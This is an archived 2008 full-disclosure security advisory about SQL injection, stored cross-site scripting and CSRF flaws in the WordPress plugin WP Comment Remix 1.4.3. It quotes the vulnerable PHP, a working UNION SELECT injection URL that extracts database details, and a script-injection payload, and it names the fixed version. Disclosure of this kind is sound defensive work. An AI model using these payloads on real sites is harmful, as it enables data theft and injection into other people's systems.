exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wpcomment-multi.txt

wpcomment-multi.txt
Posted Oct 14, 2008
Authored by g30rg3_x

WP Comment Remix version 1.4.3 suffers from cross site scripting, cross site request forgery, and SQL injection vulnerabilities.

tags | exploit, vulnerability, xss, sql injection, csrf
SHA-256 | 44edf97b2cd78b955622c67fb8230bd28b677939fe34ec4646e5ca24ef73a30a

wpcomment-multi.txt

Change Mirror Download
___________
ChX Security |
Advisory #3 |
==========

-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-

_________________
Advisory Information |
===============
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
Author: g30rg3_x <g30rg3x_at_chxsecurity_dot_org>
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt
Date of last update: 2008-10-13
CVE Name: --

____________________
Vulnerability Information |
==================
Software: WP Comment Remix
Version: 1.4.3
From: Remote
Severity: Extremely Critical
Impact:
Manipulation of data
Cross-Site Scripting
Type of Advisory: Full Disclosure

_________________
Software Description |
===============
WP Comment Remix adds a plethora of new options and features to
Wordpress. From Reply and Quote links
for commenters, to a full upgrade to the edit comments pages in the
admin panel, WPCR will save you
time and effort when running your blog.

____________________
Vulnerability Description |
==================
WP Comment Remix has multiple vulnerabilities which allow remote
attackers to conduct SQL Injection,
Cross-Site Scripting and Cross-Site Request Forgery attacks.
The SQL Injection is possible due to lack of filtration on the comment
post ID variable in the AJAX
Comments script.
The Cross-Site Scripting is possible due to lack of filtration and
escaping on several stored
options.
The Cross-Site Request Forgery is caused by the lack of the WordPress
Nonces on the options panel form.

__________________
Technical Description |
================
* SQL Injection *
Inside the script "ajax_comments.php" (around lines 27 to 29):

/---------------------
$id = $_GET['p'];

$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY
comment_date DESC");
----------------------/
As you can see in the presented code, the value of $id is taken from
HTTP GET p variable and then $id is later used
inside the SQL Query of get_results method from the $wpdb object
(which allow WordPress plugins developers to pull
multiple row results from the database), so we can inject SQL code and
the data will later be show as comment data
on the script.

As and a example we can inject something like this:
/----------------------
ajax_comments.php?p=0 UNION SELECT
1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15
--
-----------------------/
To obtain the MySQL user, Database name and MySQL version used on the server.



* Cross-Site Scripting *
Inside the script "wpcommentremix.php" (around lines 611 to 781)

(The next code is truncated to only show the vulnerable parts of the code)
/----------------------
$options['replytotext'] = $_POST['replytotext'];
...
$options['quotetext'] = $_POST['quotetext'];
$options['originallypostedby'] = $_POST['originallypostedby'];
$options['sep'] = $_POST['sep'];
$options['maxtags'] = $_POST['maxtags'];
...
$options['tagsep'] = $_POST['tagsep'];
$options['tagheadersep'] = $_POST['tagheadersep'];
$options['taglabel'] = $_POST['taglabel'];
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];
...
<input type="text" name="replytotext" value="<?=$options['replytotext']?>"><br/>
...
<input type="text" name="quotetext" value="<?=$options['quotetext']?>"><br/>
...
<input type="textbox" name="originallypostedby"
value='<?=$options['originallypostedby'];?>' />
...
<input type="text" name="sep" value="<?=$options['sep']?>"><br/>
...
<input type="text" name="taglabel" value="<?=$options['taglabel']?>"><br/>
...
<input type="text" name="tagsep" value="<?=$options['tagsep']?>"><br/>
...
<input type="text" name="maxtags" value="<?=$options['maxtags']?>"><br/>
...
<input type="text" name="tagheaderlabel"
value="<?=$options['tagheaderlabel']?>"><br/>
...
<input type="text" name="tagheadersep"
value="<?=$options['tagheadersep']?>"><br/>
-----------------------/
This variables totally lack of filtration and escaping so if we store
something like this...

/----------------------
5"><script>alert(String.fromCharCode(88,83,83));</script><input
type=hidden name=foo id="
-----------------------/
When the data is retreived to be show on the dashboard options panel
then the "bad code"
is rendered and the attack is conducted.

NOTE: There are some input variables (like replytotext) that are also
rendered to the public viewers, so is
possibly to inject "malicious code" outside of the dashboard options
panel of the plugin.



* Cross-Site Request Forgery *
The form generated by the wpcr_do_options_page function
(wpcommentsremix.php at line 585) totally
lacks from the WP Nonces (which prevent this type of attacks) and only
uses on a simple hidden input
named "wpcr_hidden_form_input" with a value of "1".
And since this and a "attacker" can force a user to submit data to the
form; this combined with
and a Cross-Site Scripting vulnerability (which was discussed
previously) can turn this vulnerability
very dangerous.

______________
Proof of Concept |
=============
Can be downloaded from here:
http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip

_______
Solution |
======
Upgrade to version 1.4.4

_______
Timeline |
=======
Bug Found: 16/09/2008
Vendor Contact: 20/09/2008
Vendor Response: 23/09/2008
Public Disclosure: 13/10/2008


ChX Security
http://chxsecurity.org/
(c) 2008

--
Original: http://chxsecurity.org/advisories/adv-3-full.txt
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close